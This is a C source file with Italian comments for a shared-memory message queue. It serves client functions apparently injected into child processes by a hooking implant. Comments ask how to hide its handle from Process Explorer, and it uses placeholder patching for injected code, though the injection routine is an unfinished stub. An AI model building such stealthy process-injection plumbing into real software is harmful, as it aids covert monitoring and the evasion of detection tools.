// XXX Con process_explorer vedo l'handle alla shared memory. Ho bisogno di un wrapper per nasconderlo?
// Il programma di sysinternals lo rileva come anomalia?

// XXX I Setup delle support function devono OBBLIGATORIAMENTE essere eseguiti dal "threadino" nel processo
// figlio (ad esempio per agganciare la shared memory)


// La memoria per la lettura e' composta da una serie di strutture che il server scrive e tutti i client
// possono leggere. La memoria per la scrittura implementa una coda di messaggi in cui i client scrivono
// e da cui il server legge.
// I client scrivono message_struct e leggono BYTE che poi loro casteranno.

// Valori base (modificabili a seconda delle esigenze)
#define MAX_MSG_LEN 512 // Lunghezza di un messaggio
#define MAX_MSG_NUM 200 // Massimo numero di messaggi in coda
#define SHARE_MEMORY_READ_SIZE 200 // Dimensione spazio per la lettura delle configurazioni da parte dei wrapper
                                   // Deve poter contenere tutti i wrapper "TAG"
#define SHARE_MEMORY_READ_NAME "H4IPCR"
#define SHARE_MEMORY_WRITE_NAME "H4IPCW"

// Valori derivati
#define SHARE_MEMORY_WRITE_SIZE (MAX_MSG_LEN * sizeof(message_struct)) 


// Macro di supporto
#define DATA_SUPPORT DWORD sfunc_len; DWORD func_chunk; DWORD data_chunk;
typedef struct { DATA_SUPPORT; } Generic_data_support;
#define INIT_SFUNC(STRTYPE)			STRTYPE *pData; \
									__asm    MOV EBX,69696969h \
									__asm	 MOV DWORD PTR SS:[pData], EBX \

#define INJECT_SFUNC(HPROC, WNAME, SNAME, UNAME, UPARAM)	(UNAME(UPARAM) ? 0 : \
															GHM_SupportInject(HPROC, (BYTE *)WNAME, SNAME.sfunc_len, (BYTE *)&SNAME, sizeof(SNAME)));

#define MMCPY(DST, SRC, SIZ)		{ BYTE *lsrc = (BYTE *)SRC; \
									  BYTE *ldst = (BYTE *)DST; \
									  DWORD lsiz = (DWORD)SIZ; \
									__asm MOV ESI, lsrc \
									__asm MOV EDI, ldst \
									__asm MOV ECX, lsiz \
									__asm REP MOVSB }


// Struttura di un messaggio scritto dai client
// Il corpo del messaggio DEVE essere sempre l'ultimo elemento (vedi IPCServerRead)
typedef struct {
	BYTE status; 
#define STATUS_FREE 0 // Libero
#define STATUS_BUSY 1 // In scrittura
#define STATUS_WRIT 2 // Scritto
	DWORD wrapper_tag;
	DWORD message_len;
	BYTE message[MAX_MSG_LEN];
} message_struct;


//-------------------- FUNZIONI DA INIETTARE (Client) ----------------------
//////////////////////////
//						//
//    IPCClientRead     //
//						//
//////////////////////////
typedef struct {
	DATA_SUPPORT;
	BYTE *mem_addr;
} IPCClientRead_data_struct;

IPCClientRead_data_struct IPCClientRead_data;


// Ritorna l'indirizzo di memoria della configurazione di un dato wrapper
// Torna NULL se fallisce
static BYTE *WINAPI IPCClientRead_func(DWORD wrapper_tag)
{
	INIT_SFUNC(IPCClientRead_data_struct);
	if (!pData->mem_addr) 
		return NULL;
	
	return (pData->mem_addr + wrapper_tag);
}

static DWORD IPCClientRead_setup(DWORD dummy)
{
	HANDLE h_file = OpenFileMapping(FILE_MAP_READ, FALSE, SHARE_MEMORY_READ_NAME);
	IPCClientRead_data.mem_addr = 0;

	// Se non riesce ad aprire l'oggetto setta mem_addr a NULL e la funzione ritornera' sempre NULL
	// Chi la richiama dovra' controllare che il valore di ritorno sia diverso da NULL prima di leggere
	// dalla memoria
	if (h_file)
		IPCClientRead_data.mem_addr = (BYTE *)MapViewOfFile(h_file, FILE_MAP_READ, 0, 0, SHARE_MEMORY_READ_SIZE);
	
	IPCClientRead_data.sfunc_len = 150; 
	return 0;
}



//////////////////////////
//						//
//    IPCClientWrite    //
//						//
//////////////////////////

typedef struct {
	DATA_SUPPORT;
	message_struct *mem_addr;
} IPCClientWrite_data_struct;

IPCClientWrite_data_struct IPCClientWrite_data;

// Torna TRUE se ha scritto, FALSE se fallisce
static BOOL WINAPI IPCClientWrite_func(DWORD wrapper_tag, BYTE *message, DWORD msg_len)
{
	unsigned int i;
	message_struct *pMessage;
	INIT_SFUNC(IPCClientWrite_data_struct);
	// Fallisce se la memoria non e' presente o se il messaggio e' troppo grosso
	// per essere scritto
	if (!pData->mem_addr || msg_len > MAX_MSG_LEN) 
		return FALSE;
	
	for (i=0, pMessage=pData->mem_addr; i<MAX_MSG_NUM; i++, pMessage++) 
		if (pMessage->status == STATUS_FREE) {
			// XXX Possibilita' di remota race condition sulla lettura dello status
			pMessage->status = STATUS_BUSY;
			pMessage->message_len = msg_len;
			pMessage->wrapper_tag = wrapper_tag;
			MMCPY(pMessage->message, message, msg_len);
			pMessage->status = STATUS_WRIT;
			return TRUE;
		}
	
	// Non ci sono spazi liberi nella coda
	return FALSE;
}

static DWORD IPCClientWrite_setup(DWORD dummy)
{
	HANDLE h_file = OpenFileMapping(FILE_MAP_ALL_ACCESS, FALSE, SHARE_MEMORY_WRITE_NAME);
	IPCClientWrite_data.mem_addr = 0;

	// Se non riesce ad aprire l'oggetto setta mem_addr a NULL e la funzione ritornera' sempre NULL
	// Chi la richiama dovra' controllare che il valore di ritorno sia diverso da NULL prima di leggere
	// dalla memoria
	if (h_file)
		IPCClientWrite_data.mem_addr = (message_struct *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_WRITE_SIZE);

	IPCClientWrite_data.sfunc_len = 150;
	return 0;
}


//-------------------- FUNZIONI per il Server ----------------------
message_struct *server_mem_addr_read = NULL;
BYTE *server_mem_addr_write = NULL;

static void IPCServerWrite(DWORD wrapper_tag, BYTE *buff, DWORD size)
{
	if (server_mem_addr_write)
		memcpy(server_mem_addr_write + wrapper_tag, buff, size);
}


// Torna TRUE se ha letto qualcosa. Non e' bloccante
static BOOL IPCServerRead(message_struct *serv_buff) 
{
	unsigned int i;
	message_struct *pMessage;

	if (!server_mem_addr_read)
		return FALSE;
	
	for (i=0, pMessage=server_mem_addr_read; i<MAX_MSG_NUM; i++, pMessage++) 
		if (pMessage->status == STATUS_WRIT) {
			// Assumendo che il coprpo del messaggio sia alla fine, copia soltanto il pezzo di messaggio
			// valorizzato (header del messaggio + msg_len)
			// Il check che msg_len sia minore di MAX_MSG_LEN viene fatto dalla funzione
			memcpy(serv_buff, pMessage, sizeof(message_struct) - MAX_MSG_LEN + pMessage->message_len);
			pMessage->status = STATUS_FREE;
			return TRUE;
		}
	
	// Non ci sono elementi da leggere
	return FALSE;

}


// Piu' veloce della Read, ritorna direttamente il messaggio nella shared memory (non fa la memcpy)
// Ma necessita che poi il messaggio sia rimosso a mano dopo che e' stato completato il dispatch
static message_struct *IPCServerPeek() 
{
	unsigned int i;
	message_struct *pMessage;

	if (!server_mem_addr_read)
		return NULL;
	
	for (i=0, pMessage=server_mem_addr_read; i<MAX_MSG_NUM; i++, pMessage++) 
		if (pMessage->status == STATUS_WRIT) 
			return pMessage;
	
	// Non ci sono elementi da leggere
	return NULL;
}


// Rimuove dalla coda un messaggio preso con IPCServerPeek
static void IPCServerRemove(message_struct *msg) 
{
	msg->status = STATUS_FREE;
}

static  void IPCServerInit() 
{
	HANDLE h_file;

	// WRITE e READ sono invertiti perche' vengono visti dall'ottica del client
	h_file = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, SHARE_MEMORY_READ_SIZE, SHARE_MEMORY_READ_NAME);
	if (h_file)
		server_mem_addr_write = (BYTE *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_READ_SIZE);

	h_file = CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, SHARE_MEMORY_WRITE_SIZE, SHARE_MEMORY_WRITE_NAME);
	if (h_file)
		server_mem_addr_read = (message_struct *)MapViewOfFile(h_file, FILE_MAP_ALL_ACCESS, 0, 0, SHARE_MEMORY_WRITE_SIZE);

	if (server_mem_addr_read)
		memset(server_mem_addr_read, 0, SHARE_MEMORY_WRITE_SIZE);

	if (server_mem_addr_write)
		memset(server_mem_addr_write, 0, SHARE_MEMORY_READ_SIZE);
}

// XXX FUNZIONE da scrivere bene 
static DWORD GHM_SupportInject(HANDLE h_process, BYTE *func, DWORD wrapper_size, BYTE *data_struct, DWORD data_size)
{
	Generic_data_support *gdata_support;

	gdata_support = (Generic_data_support *)data_struct;
	gdata_support->func_chunk = (DWORD)func;
	gdata_support->data_chunk = (DWORD)data_struct;
	return gdata_support->data_chunk;
}

#define TAG 0x69686766

//XXX inietta TUTTI gli - Devo riscriverla DEVE ESSERE ESPORTATA 
// (viene eseguita dal threadino nel figlio)
void DummyFunc()
{
	// XXX a questa funzione andrebbe passata la sfunc e queste due variabili dovrebbero essere suoi elementi
	HM_IPCClientWrite_t pIPCClientWrite;
	HM_IPCClientRead_t pIPCClientRead;

	INJECT_SFUNC(NULL, IPCClientRead_func, IPCClientRead_data, IPCClientRead_setup, NULL);
	pIPCClientRead = (HM_IPCClientRead_t)IPCClientRead_data.func_chunk;

	INJECT_SFUNC(NULL, IPCClientWrite_func, IPCClientWrite_data, IPCClientWrite_setup, NULL);
	pIPCClientWrite = (HM_IPCClientWrite_t)IPCClientWrite_data.func_chunk;


	char buffer[100];
	int i=0;
	for(;;) {
		i++;
		sprintf(buffer, "TEST %d", i);
		pIPCClientWrite(TAG, (BYTE *)buffer, strlen(buffer)+1);
	}
}


